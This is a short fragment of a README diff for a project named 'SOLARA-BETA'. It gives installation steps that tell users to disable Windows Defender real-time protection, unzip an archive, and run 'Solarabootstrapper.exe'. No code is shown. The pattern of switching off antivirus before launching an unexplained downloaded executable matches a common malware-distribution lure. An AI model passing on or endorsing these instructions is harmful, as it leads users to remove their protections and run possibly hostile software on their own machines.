CordGenics/SOLARA-BETA/README.md

 2. Navigate to "Virus & threat protection."
 3. Click on "Manage settings."
 4. Disable "Real-time protection."
 After that, unzip the file using WinRAR or 7-Zip.

+### last step:

 Once extracted, navigate to the files and double-click on Solarabootstrapper.exe.
 With this, the process is complete.

 Take a look at the source code for more details.